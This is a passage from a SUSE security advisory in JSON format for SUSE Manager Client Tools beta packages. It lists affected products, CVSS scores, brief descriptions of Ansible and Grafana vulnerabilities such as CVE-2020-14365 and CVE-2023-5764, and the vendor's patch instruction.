"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-04-24T09:10:16Z",
"details": "important"
}
],
"title": "CVE-2018-10874"
},
{
"cve": "CVE-2020-14365",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2020-14365"
}
],
"notes": [
{
"category": "general",
"text": "A flaw was found in the Ansible Engine, in ansible-engine 2.8.x before 2.8.15 and ansible-engine 2.9.x before 2.9.13, when installing packages using the dnf module. GPG signatures are ignored during installation even when disable_gpg_check is set to False, which is the default behavior. This flaw leads to malicious packages being installed on the system and arbitrary code executed via package installation scripts. The highest threat from this vulnerability is to integrity and system availability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2020-14365",
"url": "https://www.suse.com/security/cve/CVE-2020-14365"
},
{
"category": "external",
"summary": "SUSE Bug 1175993 for CVE-2020-14365",
"url": "https://bugzilla.suse.com/1175993"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-04-24T09:10:16Z",
"details": "moderate"
}
],
"title": "CVE-2020-14365"
},
{
"cve": "CVE-2023-5764",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-5764"
}
],
"notes": [
{
"category": "general",
"text": "A template injection flaw was found in Ansible where a user\u0027s controller internal templating operations may remove the unsafe designation from template data. This issue could allow an attacker to use a specially crafted file to introduce templating injection when supplying templating data.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-5764",
"url": "https://www.suse.com/security/cve/CVE-2023-5764"
},
{
"category": "external",
"summary": "SUSE Bug 1216854 for CVE-2023-5764",
"url": "https://bugzilla.suse.com/1216854"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-04-24T09:10:16Z",
"details": "moderate"
}
],
"title": "CVE-2023-5764"
},
{
"cve": "CVE-2023-6152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-6152"
}
],
"notes": [
{
"category": "general",
"text": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\n\n",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
